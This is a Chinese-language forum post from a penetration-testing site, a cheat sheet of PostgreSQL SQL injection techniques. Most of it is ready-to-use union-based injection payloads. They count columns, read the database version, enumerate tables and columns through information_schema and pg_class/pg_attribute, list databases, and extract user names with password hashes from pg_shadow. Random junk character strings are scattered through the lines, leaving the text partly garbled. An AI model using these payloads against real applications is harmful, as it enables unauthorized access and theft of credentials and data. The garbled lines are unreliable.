中国网络渗透测试联盟

标题: postgreSQL注入总结 [打印本页]

作者: admin 时间: 2013-10-13 12:57
标题: postgreSQL注入总结
结合了MSSQL MySQL Oracle的一些特点

支持多语句执行，语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/% D- l0 o4 R1 q4 v4 ~0 v# [
连接符: %20 , + , /**/

内置函数:1 S; \$ U" T# P) e" \
current_database() //当前数据库名
, W" T' E) v3 r1 Z N& ysession_user //会话用户
1 A, Y# T! p. T9 q) y2 n" H, O+ tcurrent_user //当前数据库用户
/ D- q6 o' G3 a2 |) J; tuser //当前用户
1 M( T5 w% b+ l1 Lversion() //数据库版本

Union注射:1 L- ^ k, p' [/ p& V; ^* j; ?5 s
order by n–6 G8 x! r3 E) r8 @& X9 i, F7 t
and 1=2 union select null,null,null–
" L; z+ g6 W$ G7 z7 }$ `4 z3 a$ dand 1=2 union select ‘beach’,null,null–
' h4 [ o# _* F! sand 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):
& d& g* _! p) z0 r: ~9 m* agroup_concat(table_name)
! o% O* f9 D4 G8 V6 |& vand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
5 ]5 m& m) t! O' A& \and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
9 U9 u+ E6 h7 J/ v& H* ^7 F(老版本)
% P4 t' B0 o# b0 w$ V4 Y* m$ npg_class.oid对应pg_attribute.attrelid& U Z8 o* a; h' l, d
pg_class.relname表名
+ C0 [1 ]: g4 s, \ {& u) Spg_attribute.attname字段名

select relname from pg_class获取表名
8 c( h" C4 [6 t5 @/ c% ^select oid from pg_class where 条件获取参数
' j% ~3 R! [/ q3 \2 bselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:: G2 Q" s$ e7 S0 c
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–/ W; d7 y. }' P, k& ?0 b F' o
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
* r+ C! U) f4 P9 `/ R======================================================================5 {* I* @; s0 ?4 o3 P, K, M7 ]+ g
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
/ c# e2 V- b8 iand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)